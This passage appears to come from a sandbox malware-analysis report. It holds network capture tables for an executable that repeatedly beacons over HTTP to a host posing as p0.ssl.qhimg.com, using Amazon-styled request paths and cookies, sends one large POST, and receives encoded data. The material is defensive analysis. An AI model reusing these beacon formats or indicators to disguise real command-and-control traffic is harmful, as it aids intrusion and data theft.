Dec 30, 2024 09:16:39.970264912 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:16:44.986553907 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:16:44.991509914 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:16:45.552669048 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:16:45.552737951 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:16:50.564080954 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:16:50.568970919 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:16:51.118261099 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:16:51.118356943 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:16:56.142126083 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:16:56.146970987 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:16:57.149977922 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:16:57.150054932 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:17:02.157802105 CET	49704	80	192.168.2.5	42.177.83.107
Dec 30, 2024 09:17:02.162695885 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:17:02.804416895 CET	80	49704	42.177.83.107	192.168.2.5
Dec 30, 2024 09:17:02.805519104 CET	49704	80	192.168.2.5	42.177.83.107

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 30, 2024 09:15:00.932629108 CET	58316	53	192.168.2.5	1.1.1.1
Dec 30, 2024 09:15:01.179286003 CET	53	58316	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 30, 2024 09:15:00.932629108 CET	192.168.2.5	1.1.1.1	0xa828	Standard query (0)	p0.ssl.qhimg.com.cdn.dnsv1.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 30, 2024 09:15:01.179286003 CET	1.1.1.1	192.168.2.5	0xa828	No error (0)	p0.ssl.qhimg.com.cdn.dnsv1.com	itn6qp3m.slt.sched.tdnsv8.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 09:15:01.179286003 CET	1.1.1.1	192.168.2.5	0xa828	No error (0)	itn6qp3m.slt.sched.tdnsv8.com		42.177.83.107	A (IP address)	IN (0x0001)	false
Dec 30, 2024 09:15:01.179286003 CET	1.1.1.1	192.168.2.5	0xa828	No error (0)	itn6qp3m.slt.sched.tdnsv8.com		61.240.220.214	A (IP address)	IN (0x0001)	false
Dec 30, 2024 09:15:01.179286003 CET	1.1.1.1	192.168.2.5	0xa828	No error (0)	itn6qp3m.slt.sched.tdnsv8.com		123.6.40.224	A (IP address)	IN (0x0001)	false
Dec 30, 2024 09:15:01.179286003 CET	1.1.1.1	192.168.2.5	0xa828	No error (0)	itn6qp3m.slt.sched.tdnsv8.com		14.205.47.78	A (IP address)	IN (0x0001)	false
Dec 30, 2024 09:15:01.179286003 CET	1.1.1.1	192.168.2.5	0xa828	No error (0)	itn6qp3m.slt.sched.tdnsv8.com		116.142.249.59	A (IP address)	IN (0x0001)	false
Dec 30, 2024 09:15:01.179286003 CET	1.1.1.1	192.168.2.5	0xa828	No error (0)	itn6qp3m.slt.sched.tdnsv8.com		119.167.229.212	A (IP address)	IN (0x0001)	false
Dec 30, 2024 09:15:01.179286003 CET	1.1.1.1	192.168.2.5	0xa828	No error (0)	itn6qp3m.slt.sched.tdnsv8.com		123.6.40.242	A (IP address)	IN (0x0001)	false
Dec 30, 2024 09:15:01.179286003 CET	1.1.1.1	192.168.2.5	0xa828	No error (0)	itn6qp3m.slt.sched.tdnsv8.com		221.204.72.204	A (IP address)	IN (0x0001)	false
Dec 30, 2024 09:15:01.179286003 CET	1.1.1.1	192.168.2.5	0xa828	No error (0)	itn6qp3m.slt.sched.tdnsv8.com		36.248.54.85	A (IP address)	IN (0x0001)	false
Dec 30, 2024 09:15:01.179286003 CET	1.1.1.1	192.168.2.5	0xa828	No error (0)	itn6qp3m.slt.sched.tdnsv8.com		116.142.249.98	A (IP address)	IN (0x0001)	false
Dec 30, 2024 09:15:01.179286003 CET	1.1.1.1	192.168.2.5	0xa828	No error (0)	itn6qp3m.slt.sched.tdnsv8.com		123.6.37.241	A (IP address)	IN (0x0001)	false
Dec 30, 2024 09:15:01.179286003 CET	1.1.1.1	192.168.2.5	0xa828	No error (0)	itn6qp3m.slt.sched.tdnsv8.com		60.220.179.43	A (IP address)	IN (0x0001)	false
Dec 30, 2024 09:15:01.179286003 CET	1.1.1.1	192.168.2.5	0xa828	No error (0)	itn6qp3m.slt.sched.tdnsv8.com		119.36.226.137	A (IP address)	IN (0x0001)	false
Dec 30, 2024 09:15:01.179286003 CET	1.1.1.1	192.168.2.5	0xa828	No error (0)	itn6qp3m.slt.sched.tdnsv8.com		218.29.50.234	A (IP address)	IN (0x0001)	false
Dec 30, 2024 09:15:01.179286003 CET	1.1.1.1	192.168.2.5	0xa828	No error (0)	itn6qp3m.slt.sched.tdnsv8.com		42.56.81.104	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

p0.ssl.qhimg.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	42.177.83.107	80	1720	C:\Users\user\Desktop\Z9fvmHepQC.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 09:15:01.191097975 CET	497	OUT	GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1 Accept: / Host: p0.ssl.qhimg.com Cookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache
Dec 30, 2024 09:15:03.189079046 CET	373	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 08:15:02 GMT Server: Server x-amz-id-1: THKUYEZKCKPGY5T42PZT x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo= X-Frame-Options: SAMEORIGIN X-Cache-Lookup: Cache Miss Content-Encoding: gzip Content-Length: 0 X-NWS-LOG-UUID: 4508641493690390892 Connection: keep-alive X-Cache-Lookup: Cache Miss
Dec 30, 2024 09:15:08.392365932 CET	497	OUT	GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1 Accept: / Host: p0.ssl.qhimg.com Cookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache
Dec 30, 2024 09:15:08.957767010 CET	399	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 08:15:08 GMT Server: Server x-amz-id-1: THKUYEZKCKPGY5T42PZT x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo= X-Frame-Options: SAMEORIGIN X-Cache-Lookup: Cache Miss Content-Encoding: gzip Content-Length: 14480 Accept-Ranges: bytes X-NWS-LOG-UUID: 4020878911823298965 Connection: keep-alive X-Cache-Lookup: Cache Miss
Dec 30, 2024 09:15:08.957792997 CET	1236	IN	Data Raw: fc 0c 05 79 39 a2 16 77 05 43 26 ec 4c df 70 9c 1e d4 9a 65 d3 22 49 d7 03 51 9f 0f 47 8e 4c ce f6 a3 c7 ea 21 2a e2 60 77 44 1d 20 79 db fc c0 f8 ed a3 6b 9d 57 9d d3 19 0d 08 20 6b 32 a9 28 2e 39 ba 96 2c 81 35 f4 c5 73 ce ea 1a b4 81 27 05 9b Data Ascii: y9wC&Lpe"IQGL!*`wD ykW k2(.9,5s'!dgBMoX8oz?Tn@.7#M"<gZAIJ7/eBaz}g7'cs8 '^6pq{Y/W6LH\ZL
Dec 30, 2024 09:15:08.957803011 CET	224	IN	Data Raw: 84 d9 a7 b6 1c bc 25 65 58 00 13 22 f0 ad b1 cd d2 17 38 aa 2f f3 d3 57 32 c1 cd 14 6f ef 6c 77 e3 ea 26 29 a1 f0 f0 39 a0 02 0c c6 bc f4 6e 8c 58 45 5b b7 ef cc 24 c9 18 42 75 68 5c 0d 16 02 9b cb 08 bc 1e 87 28 8d 25 a2 8f eb 22 ee 17 f7 35 5e Data Ascii: %eX"8/W2olw&)9nXE[$Buh\(%"5^C"u)4zJ^hS]43_J4aGGLQId][BK#Yp(^DNr(+Aw>vnA>2^b"U2fTCij<i
Dec 30, 2024 09:15:08.957945108 CET	1236	IN	Data Raw: 6f 1f 7a aa 4b 82 ef a9 d2 bf 5b 94 81 1c b8 ef ac b4 d3 21 08 57 6a c0 3f 55 10 5d 3e dc 7e 26 2b b2 96 f3 a3 02 97 7c 02 02 85 28 34 4d 00 22 bd d3 bb fa 86 bc 4e b1 03 c8 5d 28 28 f8 e5 90 1c 7b 80 4e 3e b1 f1 a2 90 dd f9 c1 68 8f 29 03 8f 03 Data Ascii: ozK[!Wj?U]>~&+\|(4M"N](({N>h)91F}%&<"5L5"(w8OXy]HP`l8UR7,Pi`:0xtz#up5k*D"#q.Bu>59R
Dec 30, 2024 09:15:08.957957029 CET	1236	IN	Data Raw: 3d 7c de 4a c2 db 00 05 2d d3 e6 8d 8f d9 0a 97 fa b8 99 81 58 f9 3f e4 f7 42 58 9d 2c 71 af 89 d7 48 44 33 59 53 82 1a 23 f1 9e f4 0f 84 a9 ed e5 52 15 07 ba f9 06 6a fd b0 20 11 57 28 70 dc 85 4f f0 12 e1 47 9a e1 19 47 ef 74 37 39 ff 43 28 57 Data Ascii: =\|J-X?BX,qHD3YS#Rj W(pOGGt79C(W+SnT6,jE%+HZ[5w?puWQQby{#a"YeBE(1UhW\us{"[}`r?a;^G+HElSXbl9$A@%x
Dec 30, 2024 09:15:08.957967997 CET	448	IN	Data Raw: d1 6b 25 18 6c a5 d4 11 c4 d7 28 0e b8 16 a9 31 ff fe 12 ce 15 53 20 c1 e7 0c ca 5e 42 8b 60 be 8e 54 8a 14 f7 08 f0 28 a4 75 e0 59 1c f3 06 5c 7e 28 0c 61 c3 26 5b ea 10 76 f1 f6 92 83 5c d4 ea e5 41 d8 3c dd 7a 56 59 b7 5f ed 96 91 32 b9 34 f1 Data Ascii: k%l(1S ^B`T(uY\~(a&[v\A<zVY_24'XNK]4,yw fq(R_hwZp77i,2p^y_#b@&cb@(5y%X'nc\|\eZ\=h+1'$GuID-xwZ[+-L1j^
Dec 30, 2024 09:15:08.957981110 CET	1236	IN	Data Raw: 52 b8 ed 3b 82 8b 8a cf 21 4b 68 07 2e 29 42 a1 2a a0 ed 3f c2 f0 59 12 cf 7b dc cb ec 73 02 3e 5c d5 7f ee 8c c4 ec 97 54 8c 8f c3 fd 7f 22 58 d3 dd c2 d7 cb 0a 18 87 14 cb a8 bb 2d b3 bc 04 42 45 7b a3 b0 77 3f 68 43 8b 67 92 67 5b 92 6d 13 d9 Data Ascii: R;!Kh.)B?Y{s>\T"X-BE{w?hCgg[mpGu(&Jro=h5YeGu.<rIN1sIrQEU3?8d(lmYu\Nv=[~\|T,.TGgYOk`d<V,FBB9pz
Dec 30, 2024 09:15:08.957990885 CET	1236	IN	Data Raw: 26 0f 65 35 47 7e 1d b8 8b 73 89 0a 95 fb 9b bc 43 53 19 4c f1 82 67 a8 36 26 20 ef b8 14 e5 70 b1 b3 d2 8a 74 44 b6 d3 8a 40 ab 32 1b 06 f6 e1 49 30 a4 b3 bd 59 ce 26 84 e9 50 87 63 a3 34 85 e4 b4 5b 52 0f 95 e9 34 12 66 8f 69 de 88 f8 47 eb a2 Data Ascii: &e5G~sCSLg6& ptD@2I0Y&Pc4[R4fiGkG(Be_iFtmEeHX,:opCh}dnb5u\|pJ8fxK3^0FHvsk2>)enoi5GfgnK+20hPA&H?
Dec 30, 2024 09:15:08.958002090 CET	448	IN	Data Raw: cc 50 1f ff e4 6b 38 f5 01 b4 46 a1 5e 13 44 7d 75 06 fc 13 10 48 b2 f9 73 e0 9e 54 7f cc 1e 6b 37 fc 55 43 56 f9 02 d0 59 75 6c f9 81 eb 94 2f 72 b4 cc 7a b1 5e d3 01 4a cd bb 37 4c 5b 69 e6 1f 37 16 fe 4b 96 df 3e 86 f0 f8 cd 77 ec af 9a 94 da Data Ascii: Pk8F^D}uHsTk7UCVYul/rz^J7L[i7K>w@PTD 3?ZNVVp=+rSaw^M[njGC-TtkSuw$'7#}~b698S:W Kz\EF;{6EF
Dec 30, 2024 09:15:08.958245039 CET	1236	IN	Data Raw: 26 6f c2 dd f2 b1 4f a4 47 bc 90 42 e4 42 bb 06 3c b3 a8 f0 ab c7 8e 65 e2 b7 61 13 41 20 c7 be 29 5b fd 81 5b 00 0d 64 86 46 c8 7c 92 a8 fe 0b 8a 79 a6 aa d9 c4 9a 29 72 17 c7 7e 9e b1 bc 5d 2f 69 4c d0 26 a7 87 dd 17 af 7e 0d 56 1f 0e 05 b4 1b Data Ascii: &oOGBB<eaA )[[dF\|y)r~]/iL&~V=VeDwafXSkL%Twbk\pWgx-aRh:`]Kn0wUJNB=G{Wx)z;.A0H'9mkt];-Hm+PH5
Dec 30, 2024 09:15:08.958256006 CET	224	IN	Data Raw: f9 ab 98 bc 98 9d e2 10 31 a8 9d db 34 15 b7 eb d1 ca 1f 53 ed 85 46 28 47 a2 57 68 55 28 9e 28 b3 a9 e5 68 ae 14 d2 ea c6 55 b1 d1 57 d5 ed 04 9e 7b f3 cc c4 ec 78 7a 4d 86 78 19 fb 46 ab 9f 53 09 3a cc 63 f1 aa 36 f8 58 b8 83 97 41 27 9b e1 06 Data Ascii: 14SF(GWhU((hUW{xzMxFS:c6XA'00en*p){&VD90`R3l+ ` ZVI{7L&Jp\}L"8X.xKyOihaCAn3#]q\|N.xN
Dec 30, 2024 09:15:09.633779049 CET	385	OUT	POST /N4215/adj/amzn.us.sr.aps?sz=160x600&oe=oe=ISO-8859-1;&sn=1717084268&s=3717&dc_ref=http%3A%2F%2Fupdate.firefox.com.cn HTTP/1.1 Accept: / Content-Type: text/xml X-Requested-With: XMLHttpRequest Host: p0.ssl.qhimg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Content-Length: 229272 Connection: Keep-Alive Cache-Control: no-cache
Dec 30, 2024 09:15:14.940677881 CET	374	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 08:15:14 GMT Server: Server x-amz-id-1: THK9YEZJCKPGY5T42OZT x-amz-id-2: a21JZ1xrNDNtdGRsa219bGV3YW85amZuZW9zdG5rZmRuZ2tmZGl4aHRvNDVpbgo= X-Frame-Options: SAMEORIGIN x-ua-compatible: IE=edge X-Cache-Lookup: Cache Miss Content-Length: 0 X-NWS-LOG-UUID: 236564566704692171 Connection: keep-alive X-Cache-Lookup: Cache Miss
Dec 30, 2024 09:15:19.980071068 CET	497	OUT	GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1 Accept: / Host: p0.ssl.qhimg.com Cookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache
Dec 30, 2024 09:15:20.538280010 CET	372	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 08:15:20 GMT Server: Server x-amz-id-1: THKUYEZKCKPGY5T42PZT x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo= X-Frame-Options: SAMEORIGIN X-Cache-Lookup: Cache Miss Content-Encoding: gzip Content-Length: 0 X-NWS-LOG-UUID: 372704133384497164 Connection: keep-alive X-Cache-Lookup: Cache Miss
Dec 30, 2024 09:15:25.548466921 CET	497	OUT	GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1 Accept: / Host: p0.ssl.qhimg.com Cookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache
Dec 30, 2024 09:15:26.102740049 CET	374	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 08:15:25 GMT Server: Server x-amz-id-1: THKUYEZKCKPGY5T42PZT x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo= X-Frame-Options: SAMEORIGIN X-Cache-Lookup: Cache Miss Content-Encoding: gzip Content-Length: 0 X-NWS-LOG-UUID: 16409261600853154037 Connection: keep-alive X-Cache-Lookup: Cache Miss
Dec 30, 2024 09:15:31.138855934 CET	497	OUT	GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1 Accept: / Host: p0.ssl.qhimg.com Cookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache
Dec 30, 2024 09:15:32.041342020 CET	374	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 08:15:31 GMT Server: Server x-amz-id-1: THKUYEZKCKPGY5T42PZT x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo= X-Frame-Options: SAMEORIGIN X-Cache-Lookup: Cache Miss Content-Encoding: gzip Content-Length: 0 X-NWS-LOG-UUID: 16569825597267463146 Connection: keep-alive X-Cache-Lookup: Cache Miss
Dec 30, 2024 09:15:37.048958063 CET	497	OUT	GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1 Accept: / Host: p0.ssl.qhimg.com Cookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache
Dec 30, 2024 09:15:37.604639053 CET	373	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 08:15:37 GMT Server: Server x-amz-id-1: THKUYEZKCKPGY5T42PZT x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo= X-Frame-Options: SAMEORIGIN X-Cache-Lookup: Cache Miss Content-Encoding: gzip Content-Length: 0 X-NWS-LOG-UUID: 9532017179937350846 Connection: keep-alive X-Cache-Lookup: Cache Miss
Dec 30, 2024 09:15:42.611259937 CET	497	OUT	GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1 Accept: / Host: p0.ssl.qhimg.com Cookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache
Dec 30, 2024 09:15:43.173157930 CET	374	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 08:15:42 GMT Server: Server x-amz-id-1: THKUYEZKCKPGY5T42PZT x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo= X-Frame-Options: SAMEORIGIN X-Cache-Lookup: Cache Miss Content-Encoding: gzip Content-Length: 0 X-NWS-LOG-UUID: 12144214722080533776 Connection: keep-alive X-Cache-Lookup: Cache Miss
Dec 30, 2024 09:15:48.208436966 CET	497	OUT	GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1 Accept: / Host: p0.ssl.qhimg.com Cookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache
Dec 30, 2024 09:15:48.761815071 CET	373	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 08:15:48 GMT Server: Server x-amz-id-1: THKUYEZKCKPGY5T42PZT x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo= X-Frame-Options: SAMEORIGIN X-Cache-Lookup: Cache Miss Content-Encoding: gzip Content-Length: 0 X-NWS-LOG-UUID: 1185776602895432611 Connection: keep-alive X-Cache-Lookup: Cache Miss
Dec 30, 2024 09:15:53.815128088 CET	497	OUT	GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1 Accept: / Host: p0.ssl.qhimg.com Cookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache
Dec 30, 2024 09:15:54.381702900 CET	374	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 08:15:54 GMT Server: Server x-amz-id-1: THKUYEZKCKPGY5T42PZT x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo= X-Frame-Options: SAMEORIGIN X-Cache-Lookup: Cache Miss Content-Encoding: gzip Content-Length: 0 X-NWS-LOG-UUID: 18218361616984302266 Connection: keep-alive X-Cache-Lookup: Cache Miss
Dec 30, 2024 09:15:59.407846928 CET	497	OUT	GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1 Accept: / Host: p0.ssl.qhimg.com Cookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache
Dec 30, 2024 09:15:59.987550020 CET	374	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 08:15:59 GMT Server: Server x-amz-id-1: THKUYEZKCKPGY5T42PZT x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo= X-Frame-Options: SAMEORIGIN X-Cache-Lookup: Cache Miss Content-Encoding: gzip Content-Length: 0 X-NWS-LOG-UUID: 11596198596446030139 Connection: keep-alive X-Cache-Lookup: Cache Miss
Dec 30, 2024 09:16:05.049479008 CET	497	OUT	GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1 Accept: / Host: p0.ssl.qhimg.com Cookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache
Dec 30, 2024 09:16:05.624389887 CET	373	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 08:16:05 GMT Server: Server x-amz-id-1: THKUYEZKCKPGY5T42PZT x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo= X-Frame-Options: SAMEORIGIN X-Cache-Lookup: Cache Miss Content-Encoding: gzip Content-Length: 0 X-NWS-LOG-UUID: 8936876408843510098 Connection: keep-alive X-Cache-Lookup: Cache Miss
Dec 30, 2024 09:16:10.642472982 CET	497	OUT	GET /s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books HTTP/1.1 Accept: / Host: p0.ssl.qhimg.com Cookie: skin=noskin;session-token=PdRgfX4+deu1k/mOzpK5nGIZPyQ6pY8uGpAG+N16OWbD5a+DiDF6abaXcFBw3fvEg9igEdJW5ZJWSiZaCD7qbDsZI74S6ob72tOZ3Mdp/sYYB4a3NA1ktpGm9VNXrGcvNuq7oq89Gmf7JhHJIYQLjwXeMIgpUVoTtb++Q8QFYmk=csm-hit=s-24KU11BB82RZSYGJ3BDK\|1419899012996 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache
Dec 30, 2024 09:16:11.222099066 CET	374	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 08:16:10 GMT Server: Server x-amz-id-1: THKUYEZKCKPGY5T42PZT x-amz-id-2: a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo= X-Frame-Options: SAMEORIGIN X-Cache-Lookup: Cache Miss Content-Encoding: gzip Content-Length: 0 X-NWS-LOG-UUID: 17373823909372390286 Connection: keep-alive X-Cache-Lookup: Cache Miss
